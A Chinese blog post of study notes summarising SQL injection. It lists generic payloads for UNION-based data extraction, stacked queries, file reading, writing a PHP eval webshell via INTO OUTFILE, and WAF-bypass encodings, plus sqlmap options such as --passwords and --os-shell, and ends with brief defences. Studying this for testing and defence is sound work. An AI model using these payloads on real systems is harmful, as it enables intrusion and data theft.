SQL注入小结

已于 2024-07-08 02:31:36 修改
阅读量885 收藏 18
点赞数 22
分类专栏: 个人网络安全笔记 文章标签: web安全
于 2024-03-03 20:59:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61475980/article/details/136426660
版权

1.原理

当用户提交的数据未作处理或转义直接拼接为sql语句带入数据库,就造成了sql注入。
攻击者通过构造不同的sql语句来实现对数据库的任意操作。

2.注入点

关注点:和数据库交互的参数,尤其是根据输入不同页面有不同显示的参数
在参数后面添加单引号,如果报错或者长度变化

3.分类

3.1数据库

常见的数据库类型,分为关系型数据库和非关系型数据库
关系型数据库有 MySQL、MSSQL、Access、Oracle、DB2、PostgreSQL等。
非关系型数据库有 Redis、MongoDB、Neo4j、Memcached、MemcacheDB 和 HBase等

3.2数据类型

数字型——?id=1 and 1=1 --+
字符型——要闭合符号' '' ') ") ')) "))等   ?id=1' order by x --+
搜索型——闭合通配符 %' order by x --+   ||   %' and '%1%'='%1
编码型——发送编码后的payload,后端解码后进行数据库操作
加密型——发送加密后的payload
格式型——JSON  json={“username”:“admin’ order by 4 #”}

3.3提交方式

get post $_SERVER获取的参数(cookie,user-agent...) $_REQUEST(从任意位置接收参数)
sqlmap -r

3.4注入方式

布尔注入 延时注入 报错注入

4.注入流程

mysql:
MYSQL5.0 以上版本:自带的数据库名 information_schema
information_schema:存储数据库下的数据库名及表名,列名信息的数据库
information_schema.tables:记录表名信息的表
information_schema.columns:记录列名信息表

判断注入点:?id=1'
判断类型:?id=1') 
判断列数:?id=1 order by xx --+
看显示位:?id=1 union select 1,2,3,4,5,6,7... --+
收集信息:?id=1 union select user(),2,3,4... --+ database(),user(),version()等
查数据库:union select group_concat(schema_name),2,3,4... from information_schema.schemata 
查表:union select group_concat(table_name),2,3,4... from information_schema.tables where table_schema='xxx'
查字段:union select group_concat(column_name),2,3,4... from information_schema.columns where table_name='xxx'
查数据:union select group_concat(username),group_concat(password),3,4... from 数据库名.表名

5.堆叠注入

mysql mssql Postgresql等支持
?id=1';show databases; --+ 一次执行多条

6.高权限用户读写

union select 1,load_file(‘d:/w.txt’),3,4,5,6

union select 1,‘<?php eval($_GET[x])?>’,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile ‘d:/www.txt’

7.HPP绕过

不同waf有不同处理规则
如php/apache检测第二个?uid=1&uid=2,可以在第一个参数构造payload(检测第二个,第一个仍拼接进sql语句)

8其他

access偏移注入 二次注入(注入的数据在展示时被带如数据库执行)

9.绕过

魔术引号,转义函数

转义'和",加%df绕过
宽字节注入  gbk编码时  ?id=%df' and 1=1 --+

过滤空格

%20 %09 %0a %0b %0c %0d %a0 %00 /**/ +

过滤引号

编码绕过 url hex unicode

过滤等号

like rlike regexp替换=

过滤大于小于号

between绕过
1 AND A > B--+
1 AND A NOT BETWEEN 0 AND B--+

过滤关键字

大小写 UnIoN SeLcT And...
注释分割 un/**/ion sele/**/ct

过滤逗号

join:union select 1,2,3
union select * from (select 1)a join (select 2)b join (select 3)

编码绕过

url:SELECT FIELD FROM%20TABLE
%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

unicode:SELECT FIELD%20FROM TABLE
%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

10.sqlmap使用

-u -r
--dbs
--tables -D "xx"
--columns -D "xx" -T "xx"
--dump -D "xx" -T "xx"  -C "xx"
--is-dba
--passwords 爆账户和密码
--os-shell 交互式命令
--file-read "xxxx"
--file-write "xxxx" --file-dest "xxxx"

--tamper=unmagicquotes.py   魔术引号
--tamper=base64encode.py    base64编码
1. sqlmap超详细笔记+思维导图 - bmjoker - 博客园 (cnblogs.com)

11.防御

1.SQL语句预编译
2.对SQL输入内容进行限制、过滤
3.关闭错误信息输出 ,防止物理路径、数据库版本等信息泄露
4.敏感信息严格加密处理

参考:

科普基础 | 最全的SQL注入总结 - FreeBuf网络安全行业门户

浅谈Sql注入总结笔 记整理(超详细) - FreeBuf网络安全行业门户

『 』785
关注
专栏目录
Access数据库SQL注入小结
HappyOrange2014的专栏
11-10 1万+
Access数据库SQL注入小结这里总结一下学到的Access数据库注入的知识点。
SQL注入漏洞小结
eleven_77_的博客
11-19 667
一.SQL注入漏洞的基本概念 1)前提 1, 前端传入后端的参数是用户可控的; 2, 传入的参数拼接到SQL语句,且带入数据库查询。 2)成因 由于WEB应用程序对用户输入的数据的合法性没有判断,用户通过可控参数中注入SQL语句,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为, 成因归结为两个: 1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 二.SQL注入的分类 按参数类型分类 1)数字型注入
sql注入小结
qq_41939846的博客
09-05 103
最近在学习一些sql注入方面的知识,做个笔记,加深印象。 简单案例 SELECT username FROM users WHERE username =’ _____’ GROUP BY username ORDER BY username ASC 上述横线位置输入可以进行sql注入,输入的语句即为where 的内容,从而select出符合where 限定条件后的 username(字段)下的内...
SQL注入小结
左小林的博客
02-11 2400
SQL注入小结一:什么是SQL注入二:SQL注入攻击实例三:如何防御SQL注入1. 检查变量的数据格式和数据类型2. 过滤特殊字符3. 使用预编译功能四:什么是预编译五:MyBatis怎么防范SQL注入1.mybatis中的#和$的区别:2.mybatis是如何做到防止sql注入的: 一:什么是SQL注入 SQL注入是一种网络上常见的攻击方式,是通过对程序员编写代码疏忽进行攻击的,通常通过SQL语句来实现无账号登录等操作. 二:SQL注入攻击实例 String sql = "select * from us
SQL注入漏洞学习小结
dayouzi的博客
08-22 733
Web 程序代码中对于用户提交的参数未做过滤就直接放到SQL 语句中执行,导致参数中的特殊字符打破了 SQL 语句原有逻辑,攻击者可以利用该漏洞执行任意 SQL 语句,如查询数据、下载数据、写入 webshell 、执行系统命令以及绕过登录限制等。
2021/11/22-2021/11CTFSQL注入小结ctfshow
A的博客
11-22 499
常用函数 group_concat() database() to_base64() hex() if() substr() char() regexp() floor() ceil() pi() ord() version() ascii() left() user() sleep() 库表列 information_schema information_schema.tables information_schema.columns information_schema.schemata informa
sql注入步骤小结
熊猫在路上
10-16 273
联合查询总结 步骤一:找注入点 步骤二:判断注入类型以及闭合符 步骤三:判断后台查询列数 ​ 关键语法:order by 1 %23 url转码为--> # 2 --+ url转码为--> --空格 步骤四:找显示位 ​ 关键语法:union select 1,2,3… 步骤五:查库名 1 联合查询注入使用SELECT database(); 2 盲注使用: 3 1、判断长度len(...
sql注入学习小结
心怀梦想,脚踏实地
03-27 596
sql小结 注入点类型判断: 1、字符型,数字型,其他奇奇怪怪的情况。 2、and 1=1,and 1=2 tips:有些情况下都会返回页面,无法根据页面来判断时,就需要基于时间的盲注了。忘了例子在哪了。 有回显注入步骤: 1、union select 1,2,3··· %23 确定column数量,注意最好不要使用order by,order by可能内外部数据不统一产生
SQL注入WebShell方式小结
热门推荐
Mi1k7ea
12-09 2万+
这里小结一下通过SQL注入写入WebShell的方法。 传统的SQL语句写shell 通过SQL注入select into outfile实现,如: 1' union select 1,'&lt;?php eval($_POST[a]);?&gt;' INTO OUTFILE '/var/www/tmp/nb.php'# sqlmap写shell 前提都是需要对目标目录具有写权限。 -...
PHP中全面阻止SQL注入式攻击分析小结
10-28
SQL注入攻击指的是攻击者通过在Web表单输入或页面请求的查询字符串中插入恶意SQL代码,以此来篡改后台数据库查询的结构,从而达到非法获取数据、修改数据库内容、执行管理操作等目的。 为阻止SQL注入,开发者必须...
SQL注入绕WAF小结
05-08
### SQL注入绕WAF小结 #### 一、概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过向Web应用程序提交恶意SQL语句来获取敏感数据、修改数据或执行其他非法操作。随着网络安全技术的发展,Web应用防火墙...
PHP+mysql防止SQL注入的方法小结
12-20
SQL注入 例:脚本逻辑 $sql = "SELECT * FROM user WHERE userid = $_GET[userid] "; 案例1: 复制代码 代码如下:SELECT * FROM t WHERE a LIKE ‘%xxx%’ OR (IF(NOW=SYSDATE(), SLEEP(5), 1)) OR b LIKE ‘1=1 ...
2024年自学手册 网络安全(黑客技术)
最新发布
2401_85027424的博客
10-31 485
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年最新自学手册 -网络安全(黑客技术)
2401_85027082的博客
10-31 687
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
【热门主题】000012 网络幽灵的防线:探索新时代的网络安全策略
宝码香车的博客
10-28 1111
在当今数字化的时代,网络如同一张巨大的蜘蛛网,将世界紧密地连接在一起。它为我们带来了前所未有的便利和机遇,让信息得以在瞬间传递,让人们能够跨越时空进行交流与合作。
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
ZXW_NUDT的博客
10-19 8738
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
网络安全(黑客)自学
白帽子凯哥聊黑客
10-27 940
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
浅谈网络安全
yang_xs的博客(只讲干货)
10-29 1111
网络安全是确保信息系统、网络及数据免受未授权访问、使用、披露、篡改或破坏的重要领域。随着数字化进程的加速和互联网的普及,网络安全的重要性显著提升。今天,网络威胁呈现出多样化和复杂化的趋势,企业、政府和个人都面临着数据泄露、网络攻击等风险。因此,网络安全是现代信息技术和数字社会稳定发展的基础。本文将从概念、关键要素、常见威胁、应对策略、管理体系和发展趋势六个方面进行详尽解析。网络安全是一项复杂而动态的任务,随着技术的进步和网络威胁的演变,企业和个人都需不断调整和优化安全策略。
一年期免费HTTPS证书:网络安全新选择
2403_87921797的博客
10-28 520
在网络安全日益重要的今天,一年期免费HTTPS证书为广大用户提供了更加便捷和经济的选择。JoySSL的一年期免费证书,以其高安全性和优质服务,成为用户网络安全的新选择。填写注册码230907,即可开启您的网络安全之旅。
SQLServer 存储过程调优小结
05-17
下面是一些 SQL Server 存储过程调优的小结: 1.使用 SET NOCOUNT ON 语句:这个语句可以关闭每条 SQL 语句返回的行数,减少网络流量。 2.使用 WITH RECOMPILE 选项:这个选项可以在每次执行存储过程时重新编译...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值